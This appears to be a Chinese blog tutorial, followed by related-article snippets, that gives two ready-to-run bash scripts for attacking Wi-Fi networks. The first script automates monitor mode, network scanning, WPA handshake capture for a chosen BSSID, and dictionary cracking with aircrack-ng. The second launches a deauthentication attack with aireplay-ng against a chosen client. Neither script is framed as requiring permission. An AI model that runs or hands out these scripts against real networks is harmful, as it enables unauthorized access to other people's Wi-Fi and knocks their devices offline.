airodump-ng、aircrack-ng使用教程

原创 已于 2022-09-13 02:06:55 修改 · 1.9k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#macos #kali linux #bash #wifi

于 2022-02-12 23:10:21 首次发布
这篇博客介绍了如何编写shell脚本实现Linux和Darwin系统的网络监听、网络扫描与抓取握手包,同时展示了如何进行ACK攻击。它详细展示了从启动网卡监听到密码破解的完整流程,并涉及了网络安全和渗透测试的概念。

目录

1. 集成启动网卡监听、开启网络扫描、抓取握手包的shell脚本。支持linux与Darwin

2. ack攻击

1. 集成启动网卡监听、开启网络扫描、抓取握手包的shell脚本。支持linux与Darwin

#!/bin/bash

# 启动网卡监听模式,传入系统版本
startWlanMonitor(){
    if [ $1 = "Linux" ]
    then
        if [ -z `iwconfig | awk '{if($1=="wlan0mon") print $1}'`]
        then
            airmon-ng start wlan0
        fi
    else
        echo "start Darwin wlanMonitor "
    fi
}

# 开启网络扫描,在合适的时候按'q'结束扫描,传入系统版本
startScanner(){ 
    if [ $1 = "Linux" ]
    then
        airodump-ng wlan0mon 
    else
        /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s
    fi
}

# 选择一个wifi,输入BSSID,CHANNEL,开始抓包监控,传入系统版本
startAirodump(){
    if [ $1 = "Linux" ]
    then
        read -p "input BSSID > " inputBssid
        read -p "input CHANNEL > " inputChannel
        airodump-ng -c $inputChannel --bssid $inputBssid -w ./handshake wlan0mon
    else
        read -p "input CHANNEL > " inputChannel
        /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport en0 sniff $inputChannel
    fi
}

###############################################################
# 主函数方法
###############################################################

echo "*************************************************************"
# 系统检查, 支持Linux和Darwin
system='Linux'
[ `uname` != $system ] && system='Darwin'
echo "system version:" $system
# 创建临时文件夹
[ ! -d "./tmp" ] && mkdir ./tmp
cd tmp
echo "*************************************************************"
# 选择开启监控或者只分析handshake文件,默认只分析handshake文件
read -p "only analyzing handshake file or airmon 1/2 > " inputChoose
if [ "$inputChoose" = "2" ]
then
    echo "*************************************************************"
    # 启动网卡的监听模式,传入系统版本
    startWlanMonitor $system
    echo "*************************************************************"
    # 开启网络扫描,在合适的时候按'q'结束扫描,传入系统版本
    startScanner $system
    echo "*************************************************************"
    # 选择一个wifi,输入BSSID,CHANNEL,开始抓包监控
    startAirodump $system
fi
echo "*************************************************************"
# 开始密码破解
read -p "start analyzing handshake file, y/n > " inputAsk
if [ "$inputAsk" = "y" -o "$inputAsk" = "Y" -o -z "$inputAsk" ]
then
    cp /tmp/*.cap ./
    aircrack-ng -w ../数据字典.txt ./*.cap
fi
echo "*************************************************************"
echo "exec over !!!"

2. ack攻击

#!/bin/bash
# 执行ACK攻击
echo "*************************************************************"
echo "ack attack "
echo "aireplay-ng -0 10 -a BSSID -c STATION wlan0mon"
echo "*************************************************************"
read -p "input BSSID > " BSSID
read -p "input STATION > " STATION
aireplay-ng -0 10 -a $BSSID -c $STATION wlan0mon

无线攻击 --aircrack-ng套件之一:Airodump-NG(无线数据包捕获工具)
Kevin's Blog
03-05 8698
文章目录一、用法概述二、命令格式三、用法示例3.1 扫描信号 / 数据包嗅探 / 监控网络3.2 监听指定目标频道 一、用法概述   airodump-ngaircrack-ng的套件之一。用于原始802.11帧的数据包捕获,如果您将GPS接收器连接到计算机, airodump-ng可以记录发现的接入点坐标。 嗅探数据包 / 扫描信号 二、命令格式 三、用法示例 3.1 扫描信号 / 数据...
Spring Security源码分析九:Spring Security Session管理
Karka_的博客
05-23 1096
Session:在计算机中,尤其是在网络应用中,称为“会话控制”。Session 对象存储特定用户会话所需的属性及配置信息。这样,当用户在应用程序的 Web 页之间跳转时,存储在 Session 对象中的变量将不会丢失,而是在整个用户会话中一直存在下去。当用户请求来自应用程序的 Web 页时,如果该用户还没有会话,则 Web 服务器将自动创建一个 Session 对象。当会话过期或被放弃后,服务器将终止该会话。Session 对象最常见的一个用法就是存储用户的首选项。
破解无线路由密码探测工具Airodump-ng使用教程
11-19
Windows版的Airodump-ng使用教程,来自某资深博主的破解无线路由密码探测工具系列的第五期。
aircrack-ng-win,无线网络破解
02-08
步骤1:搜索无线接入点信号,在Windows下可以使用的无线信号搜索工具有NetStumbler、WirelessMon、OmniPeek、Commview for WiFi等等,下图为使用Commview for WiFi进行无线扫描,可以看到,扫描到SSID为AR7WRD的无线接入点信号。 步骤2:将Windows版的Aircrack-ng套装解压缩到C盘下,需要说明的是,在其目录下应确保存在commview.dll、cygwin1.dll及ca2k.dll文件的存在,这些文件可以通过安装Commview for WiFi后在其安装目录中获得。在Windows下载入无线网卡,命令如下: airserv-ng -d “commview.dll|debug” 其中: -d 后跟网卡,在这里为笔记本上常见的内置Intel 3945ABG无线网卡,输入y确定。 步骤3:下面,打开airodump-ng进行无线抓包,命令如下: airodump-ng -w x.cap 127.0.0.1:666 其中: -w 后跟捕获的Cap数据包文件 后面的127.0.0.1:666即为本地无线网卡网络接口
无线网络的“透视眼”:Airodump-ng实战指南(附独家避坑技巧)
最新发布
Python84310366的博客
10-01 660
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。若长时间无握手包,可尝试主动“踢掉”已连接设备(需配合Aireplay-ng工具)。:扫描附近Wi-Fi,抓取指定网络的握手包(用于WPA破解)。当有设备连接Wi-Fi时,右上角会显示“,我也为大家准备了视频教程,其中一共有。
aircrack-ng-win_for_windows版使用说明
12-06
aircrack-ng-win_for_windows版使用说明,很详细。 有术语解释,有使用说明。
Aircrack-ngAirodump-ng命令
HoukChen的博客
08-25 3万+
描述Airodump-ng是用来抓包的,尤其适合为破解WEP收集IVs(初始向量),再用这些IVs来破解密码。另外,如果我们的电脑连接有GPS定位装置,那么airodump-ng则能够定位到它所找到的接入点的位置坐标。airodump-ng也能将接入点和客户端的信息写入文件中。用法在使用airodump-ng之前,我们可先用airmon-ng列出检测到的无线接口。另外,不建议同时使用Kismet和a
airodump-ng 5G.txt
06-30
5G频段,aircrack-ng破解,airodump-ng嗅探代码指令,含扫描与抓包指令
aircrack.zip_Airodump-ng_aircrack winpcap_aircrack-ng _key injec
07-13
aircrack is a set of ... + airodump: 802.11 packet capture program + aireplay: 802.11 packet injection program + aircrack: static WEP and WPA-PSK key cracker + airdecap: decrypts WEP/WPA capture files
Airodump-ng_for_Windows_使用方法(wpa、wep)
09-04
3. **获取 Aircrack-ng**:从 [Aircrack-ng 官方下载页面](http://download.aircrack-ng.org/aircrack-ng-1.0-rc1-win.zip) 下载 Aircrack-ng 的 Windows 版本,并解压到任意硬盘根目录。 4. **复制 ca2k.dll**:将...
利用airodump-ngaircrack-ng进行无线破解
jpygx123的博客
11-09 3113
先科普一下相关知识: WLAN的设备 WLAN主要由接入点(Access Point,AP)和客户端(Station,STA)组成接入点AP 类似于有线局域网中的交换器 负责管理客户端,协调无线与有线网络之间的通信 客户端STA 安装有无线网卡的计算机   WLAN的组网方式 WLAN的组网方式有2种: 3.1基础网络(Infrastructure Networks) 3.2自组织...
airodump-ng界面参数详解.pdf
12-06
airodump-ng是一款无线网络的Linux抓包工具,此pdf文件仅供参考学习。
Airodump-ng for Windows破解无线密码
12-20
Airodump-ng for Windows破解无线密码
aircrack-ng for windows的简单使用教程
热门推荐
Linux_get的博客
09-24 3万+
aircrack-ng for windows使用教程
Airodump-ng_for_Windows_使用方法
Donald_Pan的专栏
01-21 2万+
<br />一:八大安全问题 <br />隐藏SSID: <br />SSID,即Service Set Identifier的简称,让无线客户端对不同无线网络的识别,类似我们的手机识别不同的移动运营商的机制。参数在设备缺省设定中是被AP无线接入点广 播出去的,客户端只有收到这个参数或者手动设定与AP相同的SSID才能连接到无线网络。而我们如果把这个广播禁止,一般的漫游用户在无法找到SSID的 情况下是无法连接到网络的。<br />需要注意的是,如果黑客利用其他手段获取相应参数,仍可接入目标网络,因此,隐藏
airodump-ng使用及显示
weixin_30817749的博客
02-02 1059
PWR 表示所接收的信号的强度。表示为负数,数值赿大表示信号赿强。(绝对值赿大,数据赿值小) beacons 表示网卡接收到的AP发出的信号个数 转载于:https://www.cnblogs.com/yaocai/p/10348191.html...
sx:快速强大易于使用的现代化网络扫描器
m0_59598029的博客
08-02 935
运行速度比Nmap要快30倍;ARP扫描:支持扫描本地网络以检测活动设备;ICMP扫描:使用高级ICMP扫描技术来检测活动主机和防火墙规则;TCP SYN扫描:传统半开放扫描以查找开放TCP端口;TCP FIN/NULL/XMAS扫描:扫描某些防火墙绕过技术;自定义TCP扫描:发送任意形式数据包,并获得回复数据包中设置的所有TCP标志的结果;UDP扫描:扫描UDP端口并获取全部ICMP响应,以检测开放端口和防火墙规则;
Kaliairodump-ng
vanony的博客
12-30 4938
工具说明: 用于捕获原始802.11帧的数据包,以便与aircrack-ng一起使用。如果你有一个连接到电脑的GPS接收器,airodump-ng可以记录下找到的接入点的坐标。此外,airodump-ng会写出一个文本文件,其中包含所看到的所有访问点和客户机的详细信息。 操作: airodump-ng [选项] <接口名字> 选项意译: -H,–help 打印帮助信息界...
【亲测免费】 aircrack-ng-win_for_windows版使用说明详细介绍
gitblog_06782的博客
04-27 1265
aircrack-ng-win_for_windows版使用说明详细介绍 【下载地址】aircrack-ng-win_for_windows版使用说明详细介绍 aircrack-ng-win_for_windows版是一款专为Windows平台设计的无线网络测试工具,适合网络安全爱好者与专业人士使用。它提供了从安装到操作...
sudo airodump-ng wlan0mon
09-27
### 命令作用 `sudo airodump-ng wlan0mon` 是一个在 Linux 系统中用于无线网络扫描的命令。`airodump-ng` 是一款强大的无线网络数据包捕获工具,它可以收集无线网络的各种信息,如接入点(AP)的基本服务集标识符(BSSID)、信道、信号强度、加密方式等,以及连接到这些接入点的客户端信息。`wlan0mon` 是无线网卡的监控模式接口名称,当无线网卡处于监控模式时,它可以捕获空气中的所有无线数据包,而不仅仅是与当前连接的网络相关的数据包。 ### 使用方法 #### 前提条件 - 系统中需要安装 `aircrack-ng` 套件,因为 `airodump-ng` 是该套件的一部分。可以使用以下命令进行安装: ```bash sudo apt-get install aircrack-ng ``` - 无线网卡需要支持监控模式,并且已经将其设置为监控模式。可以使用以下命令将无线网卡 `wlan0` 设置为监控模式: ```bash sudo airmon-ng start wlan0 ``` 执行上述命令后,无线网卡将被重命名为 `wlan0mon`。 #### 执行命令 在满足前提条件后,使用以下命令开始扫描无线网络: ```bash sudo airodump-ng wlan0mon ``` 执行该命令后,`airodump-ng` 会开始扫描周围的无线网络,并在终端中实时显示扫描结果。扫描结果通常包括以下信息: - **BSSID**:接入点的 MAC 地址。 - **PWR**:信号强度,负值越大表示信号越弱。 - **Beacons**:接入点发送的信标帧数量。 - **#Data**:捕获到的数据包数量。 - **CH**:接入点使用的信道。 - **MB**:接入点支持的最大数据速率。 - **ENC**:接入点使用的加密方式,如 WPA2、WEP 等。 - **CIPHER**:加密算法。 - **AUTH**:认证方式。 - **ESSID**:接入点的名称。 #### 常用参数 - `-c <channel>`:指定扫描的信道。例如,只扫描第 6 信道的无线网络: ```bash sudo airodump-ng -c 6 wlan0mon ``` - `--bssid <BSSID>`:只扫描指定 BSSID 的接入点。例如,只扫描 BSSID 为 `00:11:22:33:44:55` 的接入点: ```bash sudo airodump-ng --bssid 00:11:22:33:44:55 wlan0mon ``` - `-w <filename>`:将扫描结果保存到指定的文件中。例如,将扫描结果保存到 `output` 文件中: ```bash sudo airodump-ng -w output wlan0mon ``` ### 可能出现的问题及解决办法 #### 扫描不到网络 - **原因**:无线网卡不支持监控模式,或者监控模式设置失败;无线网卡驱动问题;周围没有可用的无线网络。 - **解决办法**:检查无线网卡是否支持监控模式,并尝试重新设置监控模式;更新无线网卡驱动;更换扫描位置,确保周围有可用的无线网络。 #### 命令执行权限问题 - **原因**:没有使用 `sudo` 以管理员权限执行命令。 - **解决办法**:在命令前加上 `sudo`,或者使用 `root` 用户执行命令。 #### 扫描结果不准确 - **原因**:信号干扰;无线网卡性能不佳。 - **解决办法**:更换扫描位置,避免信号干扰;更换性能更好的无线网卡。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值